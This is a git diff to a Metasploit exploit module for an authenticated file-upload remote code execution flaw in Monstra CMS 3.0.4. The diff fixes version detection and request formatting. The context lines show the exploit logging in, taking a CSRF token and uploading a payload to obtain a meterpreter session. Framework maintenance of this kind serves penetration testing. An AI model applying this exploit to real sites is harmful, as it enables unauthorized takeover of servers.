diff --git a/modules/exploits/multi/http/monstra_fileupload_exec.rb b/modules/exploits/multi/http/monstra_fileupload_exec.rb index ef1b5159dd..fee19488d9 100644 --- a/modules/exploits/multi/http/monstra_fileupload_exec.rb +++ b/modules/exploits/multi/http/monstra_fileupload_exec.rb @@ -69,11 +69,11 @@ class MetasploitModule < Msf::Exploit::Remote return CheckCode::Unknown end - if res.body =~ /<\/a> - Version (\d+\.\d+\.\d+)/i + if res.body =~ /<\/a>.*?Version (\d+\.\d+\.\d+)/i version = Gem::Version.new($1) vprint_status("Monstra CMS: #{version}") - if version == '3.0.4' + if version.to_s == '3.0.4' return CheckCode::Vulnerable else return CheckCode::Safe @@ -95,8 +95,8 @@ class MetasploitModule < Msf::Exploit::Remote 'vars_post' => { 'login' => datastore['USERNAME'], 'password' => datastore['PASSWORD'], - 'login_submit' => 'Log+In', - }, + 'login_submit' => 'Log+In' + } }) cookies = res.get_cookies @@ -106,7 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'admin' '/index.php'), - 'cookie' => cookies, + 'cookie' => cookies }) fail_with(Failure::Unreachable, "#{peer} - Did not respond to Login request") if res.nil? @@ -134,9 +134,9 @@ class MetasploitModule < Msf::Exploit::Remote # Request for CSRF token for file upload. res = send_request_cgi({ 'uri' => normalize_uri(uri, 'admin', '/index.php'), - 'vars_get' => 'id=filesmanager', + 'vars_get' => {'id' => 'filesmanager'}, 'method' => 'GET', - 'cookie' => cookies, + 'cookie' => cookies }) # Grabbing CSRF token from body @@ -155,12 +155,12 @@ class MetasploitModule < Msf::Exploit::Remote # Lets Send Upload request. res = send_request_cgi({ 'uri' => normalize_uri(uri, 'admin', '/index.php'), - 'vars_get' => 'id=filesmanager', + 'vars_get' => {'id' => 'filesmanager'}, 'method' => 'POST', 'cookie' => cookies, 'Connection' => 'close', 'data' => data, - 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" }) # Cleanup delete payload after get meterpreter.